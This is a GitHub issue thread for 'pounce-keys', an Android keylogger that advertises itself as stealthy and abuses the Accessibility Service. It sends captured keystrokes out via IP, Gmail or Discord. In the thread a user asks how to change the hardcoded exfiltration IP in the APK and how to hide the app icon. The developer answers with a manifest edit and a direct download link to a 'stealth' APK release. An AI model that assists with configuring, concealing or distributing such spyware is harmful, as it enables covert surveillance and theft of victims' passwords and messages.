NullPounce / pounce-keys

PounceKey's is a Accessibility Service keylogger for Android 5 to 13! full launcher stealth. choose between receiving logs via IP, Gmail, or Discord. No txt files on device, straight buffer in logcat. Signal backdoor, best android keylogger!
https://nullpounce.com
GNU General Public License v3.0
263 stars 50 forks source link

Couldn't find "192.168.0.135" ip to change after opening Pounce-Keys.apk in APK Editor Studio in 2.0 release #4

Closed 2picodin9 closed 1 year ago

2picodin9 commented 1 year ago

@NullPounce please help me to address this issue!

2picodin9 commented 1 year ago

Ops! I found out needed ip address to change in Pounce-Keys.apk. I didn't dowload lateast version of it so i couldn't found it

2picodin9 commented 1 year ago

@NullPounce but i can't hide app icon from release 2.0

NullPounce commented 1 year ago

what version of android? and sorry yes that has not been 100% implemented, whole recode, compare the older mainfest file as i think being exported to true is the issue, seen an error about android 10 and under but i still need to implement that, thank you.

<application
        android:allowBackup="true"
        android:icon="@drawable/bac"
        android:label="@string/app_name"
        android:theme="@style/AppTheme"
        android:resizeableActivity = "true">
        <activity
            android:name=".MainActivity"
            android:label="@string/app_name"
            android:exported="false">
            <intent-filter>

try changing "android:exported="false">" to android:exported="true">

and let me know if that helps, if not regardless i have some genymotion to spin up ha ha

NullPounce commented 1 year ago

thank you for the notice very much! I have made a updated version and release right away. :)

here's a direct link to the new apk https://github.com/NullPounce/pounce-keys/releases/download/2.1/pounce-keys-2.1-stealth.apk

release notes show the edits, let me know if this works.